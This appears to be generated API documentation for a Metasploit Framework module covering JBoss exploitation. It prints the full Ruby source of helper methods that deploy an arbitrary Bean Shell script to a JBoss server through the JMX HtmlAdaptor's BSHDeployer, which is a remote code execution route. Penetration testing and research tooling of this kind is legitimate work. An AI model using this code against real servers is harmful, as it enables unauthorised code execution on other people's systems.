Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShell

Included in:
Msf::Exploit::Remote::HTTP::JBoss
Defined in:
lib/msf/core/exploit/http/jboss/bean_shell.rb

Constant Summary collapse

DEFAULT_PACKAGES =
%w{ deployer scripts }

Instance Method Summary collapse

Instance Method Details

#deploy_bsh(bsh_script) ⇒ String?

Deploys a Bean Shell script with a set of JBOSS default packages

Parameters:

  • bsh_script (String)

    The Bean Shell script to deploy

Returns:

  • (String, nil)

    The package name used to deploy the script, nil otherwise


11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# File 'lib/msf/core/exploit/http/jboss/bean_shell.rb', line 11

def deploy_bsh(bsh_script)
  package = nil

  if datastore['PACKAGE'].blank?
    packages = DEFAULT_PACKAGES
  else
    packages = [ datastore['PACKAGE'] ]
  end

  packages.each do |p|
    if deploy_package(bsh_script, p)
      return p
    end
  end

  package
end

#deploy_package(bsh_script, package) ⇒ Boolean

Deploys a Bean Shell script using the specified package

Parameters:

  • bsh_script (String)

    The Bean Shell script to deploy

  • package (String)

    The package used to deploy the script

Returns:

  • (Boolean)

    `true` if the script gets deployed, `false` otherwise


34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# File 'lib/msf/core/exploit/http/jboss/bean_shell.rb', line 34

def deploy_package(bsh_script, package)
  success = false

  print_status("Attempting to use '#{package}' as package")
  res = invoke_bsh_script(bsh_script, package)

  if res.nil?
    print_error("Unable to deploy WAR [No Response]")
  elsif res.code < 200 || res.code >= 300
    case res.code
    when 401
      print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
    else
      print_error("Unable to deploy BSH script [#{res.code} #{res.message}]")
    end
  else
    success = true
  end

  success
end

#invoke_bsh_script(bsh_script, package) ⇒ Rex::Proto::Http::Response?

Invokes a Bean Shell script on the JBoss via BSHDeployer

Parameters:

  • bsh_script (String)

    A Bean Shell script

  • package (String)

    The package used to deploy the script

Returns:


61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# File 'lib/msf/core/exploit/http/jboss/bean_shell.rb', line 61

def invoke_bsh_script(bsh_script, package)
  params =  { }
  params.compare_by_identity
  params['action']     = 'invokeOpByName'
  params['name']       = "jboss.#{package}:service=BSHDeployer"
  params['methodName'] = 'createScriptDeployment'
  params['argType']    = 'java.lang.String'
  params['arg0']       = bsh_script
  params['argType']    = 'java.lang.String'
  params['arg1']       = Rex::Text.rand_text_alphanumeric(8+rand(8)) + '.bsh'

  opts = {
    'method'	=> http_verb,
    'uri'    => normalize_uri(target_uri.path.to_s, '/HtmlAdaptor')
  }

  if http_verb == 'POST'
    opts.merge!('vars_post' => params)
  else
    opts.merge!('vars_get' => params)
  end

  send_request_cgi(opts)
end